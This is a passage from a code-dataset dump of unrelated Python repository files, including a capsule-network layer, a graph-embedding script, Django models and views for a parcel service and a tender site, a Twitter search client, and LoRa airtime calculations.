prepare being multiplied by W\n # inputs_tiled.shape=[None, num_capsule, input_num_capsule, input_dim_capsule]\n inputs_tiled = K.tile(inputs_expand, [1, self.num_capsule, 1, 1])\n\n # Compute `inputs * W` by scanning inputs_tiled on dimension 0.\n # x.shape=[num_capsule, input_num_capsule, input_dim_capsule]\n # W.shape=[num_capsule, input_num_capsule, dim_capsule, input_dim_capsule]\n # Regard the first two dimensions as `batch` dimension,\n # then matmul: [input_dim_capsule] x [dim_capsule, input_dim_capsule]^T -> [dim_capsule].\n # inputs_hat.shape = [None, num_capsule, input_num_capsule, dim_capsule]\n inputs_hat = K.map_fn(lambda x: K.batch_dot(x, self.W, [2, 3]), elems=inputs_tiled)\n\n # Begin: Routing algorithm ---------------------------------------------------------------------#\n # The prior for coupling coefficient, initialized as zeros.\n # b.shape = [None, self.num_capsule, self.input_num_capsule].\n b = tf.zeros(shape=[K.shape(inputs_hat)[0], self.num_capsule, self.input_num_capsule])\n\n assert self.routings > 0, 'The routings should be > 0.'\n for i in range(self.routings):\n # c.shape=[batch_size, num_capsule, input_num_capsule]\n c = tf.nn.softmax(b, axis=1)\n\n # c.shape = [batch_size, num_capsule, input_num_capsule]\n # inputs_hat.shape=[None, num_capsule, input_num_capsule, dim_capsule]\n # The first two dimensions as `batch` dimension,\n # then matmal: [input_num_capsule] x [input_num_capsule, dim_capsule] -> [dim_capsule].\n # outputs.shape=[None, num_capsule, dim_capsule]\n outputs = self.squash_activation(K.batch_dot(c, inputs_hat, [2, 2])) # [None, 10, 16]\n\n if i < self.routings - 1:\n # outputs.shape = [None, num_capsule, dim_capsule]\n # inputs_hat.shape=[None, num_capsule, input_num_capsule, dim_capsule]\n # The first two dimensions as `batch` dimension,\n # then matmal: [dim_capsule] x [input_num_capsule, dim_capsule]^T -> [input_num_capsule].\n # b.shape=[batch_size, num_capsule, input_num_capsule]\n b += K.batch_dot(outputs, inputs_hat, [2, 3])\n # End: Routing algorithm -----------------------------------------------------------------------#\n\n return outputs\n\n def 
compute_output_shape(self, input_shape):\n return tuple([None, self.num_capsule, self.dim_capsule])\n\n def get_config(self):\n config = {\n 'num_capsule': self.num_capsule,\n 'dim_capsule': self.dim_capsule,\n 'routings': self.routings,\n 'squash_activation': self.squash_activation\n }\n base_config = super(CapsuleLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\ndef PrimaryCap(inputs, dim_capsule, n_channels, kernel_size, strides, padding, initializer, to_flatten=False, name='primarycap'):\n \"\"\"\n Apply Conv2D `n_channels` times and concatenate all capsules\n :param inputs: 4D tensor, shape=[None, width, height, channels]\n :param dim_capsule: the dim of the output vector of capsule\n :param n_channels: the number of types of capsules\n :return: output tensor, shape=[None, num_capsule, dim_capsule]\n \"\"\"\n\n # modified original code a bit\n output = layers.Conv2D(filters=dim_capsule*n_channels, kernel_size=kernel_size, strides=strides, padding=padding,\n kernel_initializer=initializer, name='primarycap_conv2d')(inputs)\n if to_flatten:\n # flatten to shape [all capsules * height * width, dim_capsule]\n output = layers.Reshape(target_shape=(-1, dim_capsule), name='primarycap_reshape')(output)\n else:\n # reshape to 4D\n _, H, W, _ = output.shape\n output = layers.Reshape(target_shape=(H.value, W.value, n_channels, dim_capsule), name='primarycap_reshape')(output)\n return layers.Lambda(squash, name=name)(output)","repo_name":"btruhand/Parameter-Reduction-in-CapsNet","sub_path":"layers/capsule.py","file_name":"capsule.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31187073809","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport networkx as nx\nimport pandas as pd\nimport os\nimport argparse\nimport time\n\n\n\n\npd.options.mode.chained_assignment = None # default='warn'\n\n#reading multilayer network\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"performs PPI prediction and evaluation\")\n\n parser.add_argument('--multilayer_networkfile', nargs='?',\n help='multilayer_networkfile',type=str)\n parser.add_argument('--T', nargs='?',\n help= 'window size',type=int)\n parser.add_argument('--d', nargs='?',\n help= 'embedding dimension',type=int)\n parser.add_argument('--type', default = 'gml',\n help= 'network file type (gml or edgelist)',type=str)\n \n return parser.parse_args()\n\n\ndef main(args):\n start = time.time()\n import functions as f\n\n w = args.T\n d = args.d\n \n typ = args.type\n\n print(\"Computing embedding for: w=\" + str(w) + \";d=\" + str(d))\n\n\n out_folder = \"BRANEnet_emb\"\n\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n\n # read multilayer network\n if typ == 'gml':\n G = nx.read_gml(args.multilayer_networkfile)\n \n elif typ == 'edgelist':\n G = nx.read_edgelist(args.multilayer_networkfile)\n \n else:\n print(\"Incorrect file format\")\n \n A = nx.adjacency_matrix(G,nodelist = G.nodes)\n \n name = os.path.split(args.multilayer_networkfile)[1]\n name = name.split(\".\")[0]\n\n #compute PPMI matrix\n M = f.PPMI_matrix(A,w,1)\n\n #learn embedding\n emb = f.embedd(M,d)\n emb = pd.DataFrame(data=emb,index = G.nodes)\n idx = emb.index\n emb = emb.sort_index()\n\n outfile = os.path.join(out_folder, 'BRANet_' + name + '_w_' + str(w) + '_d_' +\n str(d) + '.emb')\n emb.to_csv(outfile,sep = ' ')\n\n with open(outfile) as f:\n lines = f.readlines()\n txt = str(len(G)) 
+ ' ' + str(d) +'\\n'\n lines[0] = txt \n with open(outfile, \"w\") as ff:\n ff.writelines(lines)\n ff.close()\n\n print(\"Done!\")\n end = time.time()\n print(\"Time in Seconds:\" + str(format(end - start,\".2f\")))\n \n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n ","repo_name":"Surabhivj/BRANEnet","sub_path":"BRANEnet.py","file_name":"BRANEnet.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"14121167869","text":"from sensors.lcd import Lcd as Lcd\nfrom otpcode.otp import OTP as otp\nfrom sensors.laser import Laser as Laser\nfrom sensors.ultrasonic_ranging import UltrasonicRanging as Ultrasound\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setwarnings(False)\nLcdScreen = Lcd()\ncodeGenerator = otp('patch of grass')\nlaserPointer = Laser()\nultrasoundSensor = Ultrasound()\n\ndef run():\n timeout = -1\n while True:\n if timeout > 0 and time.time() - timeout < 30:\n LcdScreen.setUpperText('Hi! Your code is')\n LcdScreen.setLowerText(' ' + codeGenerator.getCode() + ' ')\n laserPointer.turnOn()\n time.sleep(2)\n else:\n if ultrasoundSensor.getDistanceInCm() < 50:\n timeout = time.time()\n else:\n timeout = -1\n LcdScreen.clearDisplay()\n laserPointer.turnOff()\n\ndef close():\n LcdScreen.clearDisplay()\n laserPointer.turnOff()\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n try:\n run()\n except KeyboardInterrupt:\n close()\n","repo_name":"glasgow2016/team-8","sub_path":"jp_api/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29134294524","text":"from torch import nn\nfrom .base_model import BaseModel\nfrom torchocr.utils.ckpt import load_pretrained_params\n\n__all__ = ['DistillationModel']\n\n\nclass DistillationModel(nn.Module):\n def __init__(self, config):\n \"\"\"\n the module for OCR distillation.\n args:\n config (dict): the super parameters for module.\n \"\"\"\n super().__init__()\n self.model_list = nn.ModuleDict()\n for key in config[\"Models\"]:\n model_config = config[\"Models\"][key]\n freeze_params = False\n pretrained = None\n if \"freeze_params\" in model_config:\n freeze_params = model_config.pop(\"freeze_params\")\n if \"pretrained\" in model_config:\n pretrained = model_config.pop(\"pretrained\")\n model = BaseModel(model_config)\n if pretrained is not None:\n load_pretrained_params(model, pretrained)\n if freeze_params:\n for param in model.parameters():\n param.requires_grad = False\n self.model_list.add_module(key, model)\n\n def forward(self, x, data=None):\n result_dict = dict()\n for model_name in self.model_list:\n result_dict[model_name] = self.model_list[model_name](x, data)\n return result_dict\n","repo_name":"WenmuZhou/PytorchOCR","sub_path":"torchocr/modeling/architectures/distillation_model.py","file_name":"distillation_model.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1192,"dataset":"github-code","pt":"78"} +{"seq_id":"8564913562","text":"\n\n# https://adventofcode.com/2021/day/1\n# https://www.pythontutorial.net/python-basics/python-read-text-file/\ndef task1():\n with open('Day1/aoc_day1_task1_input.txt') as f:\n inputlines = f.readlines()\n\n previousline = None\n currentline = None\n biggercount = 0\n linecount = 0\n\n for line in inputlines:\n previousline = currentline\n currentline = int(line)\n linecount += 1\n\n try:\n if 
currentline > previousline:\n                biggercount += 1\n\n        except TypeError:\n            print(\"except block: first comparison\")\n\n    print(\"Total number of lines: \" + str(linecount))\n    print(\"Count of larger measurements: \" + str(biggercount))\n\n\n\n# https://adventofcode.com/2021/day/1#part2\ndef task2():\n    sw_sums = []\n\n    inputlines = []\n    with open('Day1/aoc_day1_task1_input.txt') as f:\n        inputlines = f.readlines()\n\n    for iterationCount in range(0, len(inputlines)-2): # the upper bound is exclusive, so the last window's calculation starts at index -3\n        currentSum = sum(list(map(int, inputlines[iterationCount:iterationCount+3])))\n        sw_sums.append(currentSum)\n\n    sums_count = 1 # the comparison does not count the first element\n    count_greater_than = 0\n\n    for j in range(1, len(sw_sums)):\n        sums_count += 1\n        if sw_sums[j] > sw_sums[j-1]:\n            count_greater_than += 1\n\n    print(\"Total count of lines: \" + str(len(inputlines)))\n    print(\"Total count of sums: \" + str(sums_count))\n    print(\"Sums greater than previous: \" + str(count_greater_than))\n\n\n","repo_name":"ajupar/advent_of_code_2021","sub_path":"Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41863038339","text":"import requests\nimport json\n\nclass Recent:\n    entity = None\n    bearer_token = None\n\n    # restored so the class attributes are actually set before get_query() uses them\n    def __init__(self, entity, bearer_token):\n        self.entity = entity\n        self.bearer_token = bearer_token\n\n    def __create_headers(self, bearer_token):\n        headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n        return headers\n\n    def get_query(self):\n        url = \"https://api.twitter.com/2/tweets/search/recent?query=entity:\" + self.entity + \" lang:en&max_results=100&tweet.fields=created_at\"\n        headers = self.__create_headers(self.bearer_token)\n        response = requests.get(url, headers=headers)\n\n        if response.status_code != 200:\n            raise Exception(\n                \"Cannot get stream (HTTP {}): {}\".format(\n                    response.status_code, response.text\n                )\n            )\n        return response.json()","repo_name":"bakhyaddin/swe-573","sub_path":"backend/posts/recent.py","file_name":"recent.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42782606636","text":"from django.core.validators import RegexValidator\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom io import BytesIO\nfrom django.core.files import File\nfrom django.db.models.signals import post_delete, pre_save\nfrom django.dispatch import receiver\nfrom django.db import models\nfrom django.conf import settings\n\n \n\"\"\" Whenever ANY model is deleted, if it has a file field on it, delete the associated file too\"\"\"\n@receiver(post_delete)\ndef delete_files_when_row_deleted_from_db(sender, instance, **kwargs):\n    for field in sender._meta.concrete_fields:\n        if isinstance(field,models.FileField):\n            instance_file_field = getattr(instance,field.name)\n            delete_file_if_unused(sender,instance,field,instance_file_field)\n \n\"\"\" Delete the file if something else gets uploaded in its place\"\"\"\n\n@receiver(pre_save)\ndef delete_files_when_file_changed(sender,instance, **kwargs):\n    # Don't run on initial save\n    if not instance.pk:\n        return\n    for field in sender._meta.concrete_fields:\n        if isinstance(field,models.FileField):\n            # it's got a file field.
 Let's see if it changed\n            try:\n                instance_in_db = sender.objects.get(pk=instance.pk)\n            except sender.DoesNotExist:\n                # We are probably in a transaction and the PK is just temporary\n                # Don't worry about deleting attachments if they aren't actually saved yet.\n                return\n            instance_in_db_file_field = getattr(instance_in_db,field.name)\n            instance_file_field = getattr(instance,field.name)\n            if instance_in_db_file_field.name != instance_file_field.name:\n                delete_file_if_unused(sender,instance,field,instance_in_db_file_field)\n\n\"\"\" Only delete the file if no other instances of that model are using it\"\"\" \ndef delete_file_if_unused(model,instance,field,instance_file_field):\n    dynamic_field = {}\n    dynamic_field[field.name] = instance_file_field.name\n    other_refs_exist = model.objects.filter(**dynamic_field).exclude(pk=instance.pk).exists()\n    if not other_refs_exist:\n        instance_file_field.delete(False)\n\ndef user_photo_path(instance, filename):\n    # file will be uploaded to MEDIA_ROOT/user_<id>/<filename>\n    return f\"recipient_photo/{instance.created_date.strftime('%Y')}/{instance.created_date.strftime('%m')}/{instance.created_date.strftime('%d')}/{instance.recipient_name}_{instance.recipient_id}/{instance.created_date}.{str.split(str(filename), '.')[-1]}\"\n\n\ndef edit_photo_before_save(image):\n    photo = Image.open(image)\n    photo = photo.convert('RGBA')\n    maxsize = (512, 512)\n    photo.thumbnail(maxsize, Image.ANTIALIAS)\n    width, height = photo.size\n\n    try: \n        txt_img = Image.new(\"RGBA\", (700,700), (255,255,255,0))\n        draw = ImageDraw.Draw(txt_img)\n        text = \"仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用 \\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\\n\\n仅供清关使用 仅供清关使用 仅供清关使用 仅供清关使用\"\n        try:\n            font = ImageFont.truetype(str(settings.STATIC_ROOT)+'/font/STHeiti Medium.ttc', 50)\n        except:\n            print(\"error here2\")\n        textwidth, textheight = draw.textsize(text, font)\n        x = 0\n        y = 0\n        draw.text((x, y), text=text, font=font, fill=(255, 255, 255, 150))\n        txt_img = txt_img.rotate(30).crop((10, 100, width + 10, height + 100))\n        try:\n            photo = Image.alpha_composite(photo, txt_img)\n        except:\n            print(\"error here3\")\n    except:\n        print(\"error here1\")\n\n    thumb_io = BytesIO() # create a BytesIO object\n    photo = photo.convert('RGB')\n    photo.save(thumb_io, 'JPEG', quality=85) \n    thumbnail = File(thumb_io, name=image.name)\n    return thumbnail\n\nclass Express(models.Model):\n    class Meta:\n        verbose_name = '快递订单'\n        verbose_name_plural = \"快递订单\"\n    # 代理人账号:ZZagent (固定)\n    agent_account = models.CharField(max_length=200, default='ZZagent', verbose_name=\"代理人账号\")\n    # 散客名称:(自动)\n    auto_recipient_name = models.CharField(max_length=200, verbose_name=\"散客名称\", default='')\n    #发件人姓名:选填 \n    sender_name = models.CharField(max_length=200, null=True, verbose_name=\"发件人姓名(选填)\", blank=True, default='')\n    #发件人手机号码:选填\n    mobile_regex = RegexValidator(regex=r'(^0[789]0[0-9]{4}[0-9]{4}$)|^(13[0-9]|14[01456879]|15[0-3,5-9]|16[2567]|17[0-8]|18[0-9]|19[0-3,5-9]{3})[0-9]{8}$', message=\"请输入日本或中国手机号码(不加-)\")\n    sender_mobile_num = models.CharField(validators=[mobile_regex], max_length=17, 
verbose_name=\"发件人手机号码\", default='')\n # 发件人国家: (固定)\n sender_country = models.CharField(max_length=200, default='日本', verbose_name=\"发件人国家\")\n # 发件人省: (固定)\n sender_province = models.CharField(max_length=200, default='埼玉县', verbose_name=\"发件人省\")\n # 发件人市: (固定)\n sender_city = models.CharField(max_length=200, default='川口市', verbose_name=\"发件人市\")\n # 发件人区(县): (固定)\n sender_district = models.CharField(max_length=200, default='幸町', verbose_name=\"发件人区(县)\")\n # 发件人地址: (固定)\n sender_address = models.CharField(max_length=200, default='〒 332-0016埼玉県川口市幸町1-14-10', verbose_name=\"发件人地址\")\n\n\n \n # 收件人姓名:(必须填写)\n recipient_name = models.CharField(max_length=200, verbose_name=\"收件人姓名\", default='')\n # 收件人手机: (必须填写)\n ch_phone_regex = RegexValidator(regex=r'^(13[0-9]|14[01456879]|15[0-3,5-9]|16[2567]|17[0-8]|18[0-9]|19[0-3,5-9]{3})[0-9]{8}$', message=\"请输入中国手机号码\")\n recipient_phone_num = models.CharField(max_length=200, validators=[ch_phone_regex], verbose_name=\"收件人手机\", default='')\n # 收件人国家:(中国) 固定\n recipient_country = models.CharField(max_length=200, default='中国', verbose_name=\"收件人国家\")\n # 收件人省:(可选择)\n recipient_province = models.CharField(max_length=200, verbose_name=\"收件人省\", default='')\n # 收件人市:(可选择)\n recipient_city = models.CharField(max_length=200, verbose_name=\"收件人市\", default='')\n # 收件人区(县):(可选择)\n recipient_district = models.CharField(max_length=200, verbose_name=\"收件人区(县)\", default='')\n # 收件人详细地址:xx省xx市xx区(县)xx号\n recipient_addr = models.CharField(max_length=200, verbose_name=\"收件人详细地址\", default='')\n # 收件人身份证号码: \n id_regex = RegexValidator(regex=r'^[1-9]\\d{5}(18|19|20)\\d{2}((0[1-9])|(1[0-2]))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx]$', message=\"请输入正确的身份证号\")\n recipient_id = models.CharField(validators=[id_regex], max_length=200, verbose_name=\"收件人身份证号码\", default='')\n #发件登录日期时间 (自动)\n created_date = models.DateTimeField(auto_now_add=True, verbose_name=\"发件人登录时间\")\n #发件人微信名字:(必须填写)\n sender_wechat_name = models.CharField(max_length=200, verbose_name=\"发件人微信名字\", default='')\n #发件人微信号:(必须填写)\n sender_wechat_num = models.CharField(max_length=200, verbose_name=\"发件人微信号\", default='')\n #发件店铺\n shop = models.CharField(max_length=200, null=True, verbose_name=\"发件店铺\")\n # 收件人身份证照片上传:建议上传 如遇海关抽查不能及时提交身份证照片出现任何问题我司概不负责\n recipient_photo = models.ImageField(verbose_name=\"收件人身份证照片上传\", blank=True, upload_to=user_photo_path) \n\n # 快递单号\n track_number = models.CharField(max_length=200, verbose_name=\"快递单号\", null=True, blank=True)\n # 包裹状态\n packet_state = models.CharField(max_length=20, verbose_name=\"包裹状态\", default='未发送', blank=True)\n\n def save(self, *args, **kwargs):\n if not self.sender_name:\n self.sender_name = self.sender_wechat_name\n self.auto_recipient_name = self.shop[:-1]\n if self.track_number:\n self.packet_state = '已发送'\n if self.recipient_photo:\n try:\n self.recipient_photo = edit_photo_before_save(self.recipient_photo)\n except:\n pass\n super(Express, self).save(*args, **kwargs)\n\n\n def __str__(self):\n return self.sender_wechat_num + '-----' + str.split(str(self.created_date), '.')[0]+ '-----' + str(self.track_number)\n\n","repo_name":"lighthouse-plan/express","sub_path":"etrack/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19562478292","text":"from django.shortcuts import render\nfrom government_employee.models import TenderNotice\nfrom .forms import *\nfrom django.contrib.auth.decorators import 
login_required\nfrom government_employee.models import ApplyTenderHolderShortList, WinnerHolder\nfrom .filters import *\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import JsonResponse\nfrom django.db.models import Count\nfrom SuperAdmin.models import Ministry\n\n\ndef home_tender_list(request):\n tender = TenderUpload.objects.all()\n MyFilter = TenderUploadFilter(request.GET, queryset=tender)\n tender = MyFilter.qs\n page = request.GET.get('page', 1)\n paginator = Paginator(tender, 10)\n try:\n tender = paginator.page(page)\n except PageNotAnInteger:\n tender = paginator.page(1)\n except EmptyPage:\n tender = paginator.page(paginator.num_pages)\n\n context = {\n 'tender': tender,\n 'MyFilter': MyFilter\n }\n return render(request, 'index.html', context=context)\n\n\ndef tender_chart(request):\n labels = []\n data = []\n\n queryset = TenderUpload.objects.values('ministry_name__ministry_name').annotate(tender_count=Count('ministry_name'))\n for entry in queryset:\n labels.append(entry['ministry_name__ministry_name'])\n data.append(entry['tender_count'])\n\n return JsonResponse(data={\n 'labels': labels,\n 'data': data,\n })\n\n\ndef list_of_apply_tender(request):\n apply_tender = ApplyTender.objects.filter(username=request.user)\n page = request.GET.get('page', 1)\n paginator = Paginator(apply_tender, 10)\n try:\n apply_tender = paginator.page(page)\n except PageNotAnInteger:\n apply_tender = paginator.page(1)\n except EmptyPage:\n apply_tender = paginator.page(paginator.num_pages)\n\n context = {\n 'apply_tender': apply_tender\n }\n return render(request, 'Holder/ApplyHolder/apply_tender_list.html', context=context)\n\n\n@login_required(login_url='log_in')\ndef apply_tender_create(request, tender_id):\n tender = TenderUpload.objects.get(id=tender_id)\n form = ApplyTenderForm()\n if request.method == \"POST\":\n form = ApplyTenderForm(request.POST or None, request.FILES or None, instance=tender)\n if form.is_valid():\n ta = form.save(commit=False)\n tender_apply = ApplyTender()\n tender_apply.tender = tender\n tender_apply.username = request.user\n tender_apply.number = form.cleaned_data['number']\n tender_apply.trx_id = form.cleaned_data['trx_id']\n tender_apply.bank_trx_id = form.cleaned_data['bank_trx_id']\n tender_apply.proposal_pdf = form.cleaned_data['proposal_pdf']\n tender_apply.working_experience = form.cleaned_data['working_experience']\n tender_apply.proposed_amount = form.cleaned_data['proposed_amount']\n tender_apply.payment_method = form.cleaned_data['payment_method']\n tender_apply.bank_check_image = form.cleaned_data['bank_check_image']\n tender_apply.save()\n context = {\n 'form': form\n }\n return render(request, 'Holder/ApplyHolder/apply_holder_create.html', context=context)\n if request.method == \"GET\":\n context = {\n 'form': form\n }\n return render(request, 'Holder/ApplyHolder/apply_holder_create.html', context=context)\n\n\ndef holder_list_of_holder_short_list(request, tender_id):\n short_list = ApplyTenderHolderShortList.objects.filter(tender__tender__id=tender_id)\n context = {\n 'short_list': short_list\n }\n return render(request, 'Holder/ApplyHolder/apply_tender_holder_short_list.html', context=context)\n\n\ndef holder_winner_holder_list(request, tender_id):\n # winner_holder = WinnerHolder.objects.filter(tender=tender_id)\n tender = TenderUpload.objects.get(id=tender_id)\n print('tender ==', tender.id)\n winner_holder = WinnerHolder.objects.filter(tender__tender__id=tender_id)\n context = {\n 'winner_holder': 
winner_holder\n    }\n    return render(request, 'Holder/ApplyHolder/winner_holder_list.html', context=context)\n\n\ndef user_winner_holder_list(request):\n    winner_holder = WinnerHolder.objects.filter(username=request.user)\n    page = request.GET.get('page', 1)\n    paginator = Paginator(winner_holder, 10)\n    try:\n        winner_holder = paginator.page(page)\n    except PageNotAnInteger:\n        winner_holder = paginator.page(1)\n    except EmptyPage:\n        winner_holder = paginator.page(paginator.num_pages)\n\n    context = {\n        'winner_holder': winner_holder\n    }\n    return render(request, 'Holder/ApplyHolder/my_tender_list.html', context=context)\n\n\ndef about(request):\n    return render(request, 'about.html')\n\n\ndef service(request):\n    return render(request, 'service.html')\n\n\ndef all_tender_notice(request):\n    tender_notice = TenderNotice.objects.all().order_by('created_date')\n    page = request.GET.get('page', 1)\n    paginator = Paginator(tender_notice, 10)\n    try:\n        tender_notice = paginator.page(page)\n    except PageNotAnInteger:\n        tender_notice = paginator.page(1)\n    except EmptyPage:\n        tender_notice = paginator.page(paginator.num_pages)\n    context = {\n        'tender_notice': tender_notice\n    }\n    return render(request, 'tender_notice.html', context=context)\n","repo_name":"Toufiqul-Islam-Noyon/ETender","sub_path":"holder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70473753853","text":"from bs4 import BeautifulSoup\nimport requests\nimport asyncio\nimport time\nfrom googletrans import Translator\nimport async_google_trans_new\n\n\nclass Interpreter:\n\n    def __init__(self, url):\n        self.url = url\n        self.titles = None\n        self.list_ = None\n\n    def get_titles(self):\n        response = requests.get(self.url)\n        response = response.text\n        soup = BeautifulSoup(response, \"html.parser\")\n        # either keep html.parser, or install the extra dependency with pip install lxml to use the xml parser\n        titles = soup.findAll('title')\n        titles = [str(title).replace('<title>', \"\").replace('</title>', \"\").replace('NYT', \"\")\n                  for title in titles]\n        self.titles = list(set(titles))\n        print(self.titles)\n\n    def translate_titles(self):\n        self.list_ = []\n        translator = Translator()\n        for title in self.titles:\n            translation = translator.translate(text=title, dest='ru', src='auto')\n            self.list_.append(translation.text)\n        print(f\"finished at {time.strftime('%X')}\")\n\n    async def async_translate_titles(self):\n        g = async_google_trans_new.AsyncTranslator()\n        list_ = []\n        for title in self.titles:\n            list_.append(g.translate(title, \"ru\"))\n        self.list_ = await asyncio.gather(*list_)\n\n    def translation_to_file(self):\n        with open(\"translated.txt\", 'w') as file:\n            for item in self.list_:\n                file.write(item + \"\\n\")\n        with open(\"original.txt\", \"w\", encoding=\"utf-8\") as file:\n            for title in self.titles:\n                file.write(title + \"\\n\")\n\n\nif __name__ == '__main__':\n    print(f\"started at {time.strftime('%X')}\")\n    URL = \"https://rss.nytimes.com/services/xml/rss/nyt/World.xml\"\n    some_interp = Interpreter(URL)\n    some_interp.get_titles()\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(some_interp.async_translate_titles())\n    loop.close()\n    some_interp.translation_to_file()\n    print(f\"finished at {time.strftime('%X')}\")
\n","repo_name":"egorsemevskiy/NewsAggr","sub_path":"url_to_translation.py","file_name":"url_to_translation.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28131497563","text":"from django.conf.urls import url, include\nfrom .views import (HorarioCreateView,HorarioListView,HorarioUpdateView,HorarioDeleteView,\n\t HorarioListAPIView,HoraListaAPIView,HorarioAPI,HorarioCreateView,HorarioDeleteAPIView,HorarioUpdateAPIView)\n\nurlpatterns = [ \n\n url(r'^add$', (HorarioCreateView.as_view()), name='adicionar_horario'),\n url(r'^lst', (HorarioListView.as_view()), name='listar_horarios'),\n url(r'^upd/(?P\\d+)/$', (HorarioUpdateView.as_view()), name='editar_horario'),\n url(r'^dlt/(?P\\d+)/$',HorarioDeleteView.as_view(), name='eliminar_horario'),\n # url(r'^api', HorarioList.as_view(), name='horario-list'),\n # urls de las APIS\n url(r'^lstapi',HorarioListAPIView.as_view(), name=\"lstapi\"),\n url(r'^lstaapi',HorarioAPI.as_view(), name=\"lstaapi\"),\n url(r'^add-api',HorarioCreateView.as_view(),name=\"add-api\"),\n url(r'^upd-api/(?P\\d+)/$',HorarioCreateView.as_view(),name=\"upd-api\"),\n url(r'^dlt-api/(?P\\d+)/$',HorarioDeleteAPIView.as_view(),name=\"dlt-api\"),\n\n\n]\n\n","repo_name":"dyronrh/hcmfront-for-test","sub_path":"horario/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8062921898","text":"#!/usr/bin/env python3\nimport unittest\nfrom modules.classify import classify\nfrom modules.features import feature_combinations\nimport pandas as pd\nimport json\n\nclass TestCalc(unittest.TestCase):\n\n def test_getData(self):\n t=classify()\n t.bam='test/data/test.bam'\n t.inVCF='test/data/MRSA_r9_10.vcf'\n t.ref='test/data/MRSA252_mut.fasta'\n t.getData()\n #t.SNPs.to_csv('test/data/example_classifier_data.csv')\n dfExpected=pd.read_csv('test/data/example_classifier_data.csv',index_col=0)\n pd._testing.assert_frame_equal(t.SNPs, dfExpected)\n\n def test_classifier(self):\n t=classify()\n t.combination='composite'\n t.keep=set()\n t.probFilt=0\n t.maskWeak = False\n\n t.modelFile='test/data/r9.4.1_composite_model.sav'\n t.SNPs=pd.read_csv('test/data/example_classifier_data_full.csv',index_col=0)\n t.loadModel()\n t.classify()\n #t.SNPs.to_csv('test/data/example_classified_data_full.csv')\n dfExpected=pd.read_csv('test/data/example_classified_data_full.csv',index_col=0)\n pd._testing.assert_frame_equal(t.SNPs, dfExpected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"oxfordmmm/forest_filter","sub_path":"test/test_classify.py","file_name":"test_classify.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41107532949","text":"# Created by Mohamad ChamanMotlagh\n# 06/04/2021\nimport math\n\n\ndef calculate_bitrate(bw, sf, cr):\n bitrate = bw / (2 ** sf)\n bitrate *= sf * cr\n return round(bitrate, 2)\n\n\ndef calculate_sensitivity(bw, sf):\n snr = 10 * math.log10(31 / (2 ** sf))\n sensitivity = -174 + 6 + snr\n sensitivity += 10 * math.log10(bw * 1000)\n return round(sensitivity, 2)\n\n\ndef calculate_toa(bw, sf, cr, pl):\n temp = ((8 * pl) - (4 * sf) + 28 + 16) / (4 * (sf - 2))\n n = 8 + max(math.ceil(temp * (cr + 4)), 0)\n tpl = n * ((2 ** sf) / bw)\n tpr = (4.25 + 8) * ((2 ** sf) / bw)\n toa = tpr + tpl\n return round(toa, 2)\n\n\ndef 
